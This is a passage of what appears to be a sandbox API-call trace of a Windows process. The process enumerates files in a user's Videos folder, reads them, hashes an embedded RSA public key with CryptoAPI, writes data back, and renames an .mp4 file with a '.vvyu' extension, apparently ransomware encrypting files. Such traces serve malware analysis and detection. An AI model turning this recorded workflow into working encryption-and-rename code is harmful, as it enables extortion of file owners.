(HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a450 [0197.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4b0 [0197.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0197.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4c8 [0197.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a468 [0197.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0197.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a438 [0197.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0197.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0197.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d3a0 | out: hHeap=0x6a0000) returned 1 [0197.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.710] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x915a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x915a, lpOverlapped=0x0) returned 1 [0197.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.711] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x915f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.712] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.713] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.714] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.714] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.714] CloseHandle (hObject=0x52c) returned 1 [0197.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0197.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d3a670 [0197.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0197.717] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\235vhS8kOU7y.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\235vhs8kou7y.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\235vhS8kOU7y.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\235vhs8kou7y.mp4.vvyu")) returned 1 [0197.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.721] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0197.724] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbed74b00, ftCreationTime.dwHighDateTime=0x1d8a58a, ftLastAccessTime.dwLowDateTime=0xad05a1e0, ftLastAccessTime.dwHighDateTime=0x1d8a71c, ftLastWriteTime.dwLowDateTime=0xad05a1e0, ftLastWriteTime.dwHighDateTime=0x1d8a71c, nFileSizeHigh=0x0, nFileSizeLow=0x12fdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b5aBDkyBYyj.swf", cAlternateFileName="B5ABDK~1.SWF")) returned 1 [0197.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0197.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.725] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\b5aBDkyBYyj.swf") returned=".swf" [0197.725] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\b5aBDkyBYyj.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\b5abdkybyyj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.726] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=77788) returned 1 [0197.726] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.730] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x12fb6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.730] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.733] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.733] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x12fdc, lpOverlapped=0x0) returned 1 [0197.734] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.734] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.734] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.735] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0197.736] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.736] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.736] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.736] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.736] GetLastError () returned 0x0 [0197.736] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.736] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0197.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.736] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.737] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.737] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12fe0) returned 0x2d4f778 [0197.737] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d3a0 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d3e8 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.738] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0197.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0197.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a468 [0197.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a450 [0197.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0197.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0197.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0197.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.741] GetCurrentThreadId () returned 0x264 [0197.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 